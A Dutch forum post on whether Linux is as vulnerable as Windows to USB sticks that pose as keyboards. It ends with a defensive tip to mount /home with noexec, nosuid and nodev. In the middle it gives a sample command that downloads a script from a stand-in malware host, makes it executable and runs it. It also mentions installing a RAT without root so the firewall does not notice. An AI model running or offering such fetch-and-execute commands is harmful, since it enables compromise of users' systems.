Overigens is niet duidelijk, of Linux-systemen hier even kwetsbaar voor zijn als Windows-systemen. Mogelijk zijn beide theoretisch even kwetsbaar, maar waarschijnlijk zal de kwaadaardige programmatuur (zoals gebruikelijk) zich vooral richten op Windows en wellicht Android.
Theoretisch even kwetsbaar? Een standaard (usb-stick die zich gedraagt als) toetsenbord werkt met Linux net zo goed als met Windows.
Dat er minder Linux-desktops zijn maakt niet uit, dit kan worden gebruikt voor een doelgerichte (professionele) aanval (op iemand of organisatie die je niet mag) en kan rekening houden met het besturingssysteem van het slachtoffer. Ik verwacht niet snel dat iets of iemand lukraak heel veel besmette usb-sticks gaat rondstrooien (om maar af te wachten wie er in trapt), dan zal het (vroeg of laat/iemand) gaan opvallen.
Misschien is een/de gemiddelde Linux gebruiker zelfs een makkelijker slachtoffer? Met alleen een toetsenbord zijn de mogelijkheden
enorm (wget http: //mijnmalwaresite.domein/kwaadscript.sh && chmod +x kwaadscript.sh && ./kwaadscript.sh, enz.).
Gebruikt de malware internet (poort 80) zal de “veilige” (gufw) firewall-instellingen het niet tegenhouden. Mijn Windows firewall vraagt om toestemming als een nieuw/vreemd programma het internet op wil. Bijvoorbeeld Teamviewer (Remote Access Tool) vroeg de 1
e keer toestemming om het internet op te gaan, ClamAV moest ik toestemming geven om virusupdates te downloaden enz. maar in Ubuntu kan dat gelijk (onopvallend).
Teamviewer (
niet mijn favoriete RAT) kan je zonder root (sudo) installeren (
Run TeamViewer without installation en voor Windows is er een portable-versie) maar waarschijnlijk zal een professionele aanvaller wel wat beters (irc? tor?) gebruiken (door een kwaadscript relatief eenvoudig te installeren
en te configureren om beschikbare internetpoorten te gebruiken
zonder root/sudo), het gaat om het idee erachter.
OplossingVoor de paranoïde Linux gebruiker: plaats de persoonlijke mappen (/home) op een eigen partitie en mount die met de opties
noexec,nosuid,nodev Dan kunnen geen eigen programma's of scripts meer worden gestart (
8.1 Software Restriction → punt 2).
Probleem opgelost (maar wel saai dus
niet aanbevolen anders oppassen met iets aansluiten, zeker geen vreemde usb-sticks
).